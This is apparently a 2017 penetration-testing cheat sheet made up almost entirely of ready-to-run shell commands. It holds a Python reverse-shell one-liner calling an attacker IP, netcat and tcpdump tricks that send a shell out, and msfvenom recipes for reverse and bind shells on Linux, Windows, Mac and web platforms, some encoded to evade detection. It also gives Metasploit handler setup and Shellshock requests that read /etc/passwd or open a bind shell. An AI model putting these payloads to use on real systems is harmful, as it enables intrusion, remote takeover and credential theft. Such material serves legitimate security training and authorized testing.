Shells (Guide to all types of shells that you might need)

2017, Dec 17    

Shells (Guide to all types of shells that you might need)

Netcat Shell Listener

  nc -nlvp 4444

Spawning a TTY Shell - Break out of Jail or limited shell

You should almost always upgrade your shell after taking control of an apache or www user.

(For example when you encounter an error message when trying to run an exploit sh: no job control in this shell )

(hint: sudo -l to see what you can run)

  • You may encounter limited shells that use rshell-session and only allow you to execute a single command per session. You can overcome this by executing an SSH shell to your localhost:
    ssh user@$ip nc $localip 4444 -e /bin/sh
    enter user's password
    python -c 'import pty; pty.spawn("/bin/sh")'
    export TERM=linux
  
    python -c 'import pty; pty.spawn("/bin/sh")'
  
    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM);          s.connect(("$ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(\["/bin/sh","-i"\]);'
  
  python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  
    echo os.system('/bin/shell-session')
  
    /bin/sh -i
  
    perl —e 'exec "/bin/sh";'
  
    # perl:
    exec "/bin/sh";
  
    # ruby:
    exec "/bin/sh"
  
    # lua:
    os.execute('/bin/sh')
  
    # From within IRB:
    exec "/bin/sh"
  
    # From within vi:
    :!shell-session
    # or
    :set shell=/bin/shell-session:shell
  
    # From within vim
    ':!shell-session':
  
    # From within nmap:
    !sh
  
    # From within tcpdump
    echo $’id\\n/bin/netcat $ip 443 –e /bin/shell-session’ > /tmp/.test chmod +x /tmp/.test sudo tcpdump –ln –I eth- -w /dev/null –W 1 –G 1 –z /tmp/.tst –Z root
  
    # From busybox
    /bin/busybox telnetd -|/bin/sh -p9999
  

Creating Meterpreter Shells with MSFVenom

most-useful-msfvenom-payloads

Linux

    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
  

Windows

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
  

Mac

    msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
  

Web Payloads

  • PHP
  msfvenom -p php/reverse_php LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
  ## OR
  msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

  ## Then we need to add the <?php at the first line of the file so that it will execute as a PHP webpage:
  cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
  • ASP
  msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
  • JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
  • WAR
  msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

Scripting Payloads

  • Python
  msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
  • shell-session
  msfvenom -p cmd/unix/reverse_shell-session LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
  • Perl
  msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

Shellcode

For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.

  • Linux Based Shellcode
  msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
  • Windows Based Shellcode
  msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
  • Mac Based Shellcode
  msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Handlers

Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.

  use exploit/multi/handler
  set PAYLOAD <Payload name>
  set LHOST <LHOST value>
  set LPORT <LPORT value>
  set ExitOnSession false
  exploit -j -z

Once the required values are completed the following command will execute your handler – msfconsole -L -r

  use auxiliary/scanner/ssh/ssh_login
  use post/multi/manage/shell_to_meterpreter
  • SBD.exe

    sbd is a Netcat-clone, designed to be portable and offer strong encryption. It runs on Unix-like operating systems and on Microsoft Win32. sbd features AES-CBC-128 + HMAC-SHA1 encryption (by Christophe Devine), program execution (-e option), choosing source port, continuous reconnection with delay, and some other nice features. sbd supports TCP/IP communication only.

    sbd.exe (part of the Kali linux distribution: /usr/share/windows-binaries/backdoors/sbd.exe) can be uploaded to a windows box as a Netcat alternative.

  • Shellshock

    • Testing for shell shock with NMap
      root@kali:~/Documents# nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/admin.cgi $ip
    
      ./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose
    
  • Shell Shock SSH Forced Command

    Check for forced command by enabling all debug output with ssh

      ssh -vvv
      ssh -i noob noob@$ip '() { :;}; /bin/shell-session'
    
  • cat file (view file contents)
      echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {:;}; echo \\$(</etc/passwd)\\r\\nHost:vulnerable\\r\\nConnection: close\\r\\n\\r\\n" | nc TARGET 80
    
  • Shell Shock run bind shell
      echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {:;}; /usr/bin/nc -l -p 9999 -e /bin/sh\\r\\nHost:vulnerable\\r\\nConnection: close\\r\\n\\r\\n" | nc TARGET 80
    

Reverse Shell with Msfvenom

List payloads

msfvenom -l

Or

msfvenom --list payloads

Generate a PHP payload

msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

Generate a Windows payload

Meterpreter - Reverse shell (x64):

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > reverse.exe

Meterpreter - Reverse shell:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Attacker_IP> LPORT=<Attacker_PORT> -f exe > reverse.exe
Meterpreter - Bind shell:
msfvenom -p windows/meterpreter/bind_tcp RHOST=<Target_IP> LPORT=<Target_Port> -f exe > bind.exe
CMD - Reverse shell:
msfvenom -p windows/shell/reverse_tcp LHOST=<Attacker_IP> LPORT=<Attacker_port> -f exe > prompt.exe

Generate a Linux payload

Meterpreter - Reverse shell:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Attacker_IP> LPORT=<Attacker_port> -f elf > reverse_bin

Generate a Python payload

msfvenom -p cmd/unix/reverse_python LHOST=<Attacker_IP> LPORT=<Attacker_port> -f raw > reverse.py

Generate a WAR payload

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Attacker_IP> LPORT=<Attacker_port> -f war > payload.war

Generate an ASP payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Attacker_IP> LPORT=<Attacker_PORT> -f asp > reverse.asp

Generate encoded payloads

Shikata_ga_nai

msfvenom -p <PAYLOAD> -e shikata_ga_nai -i 5 -f raw > reverse

Sources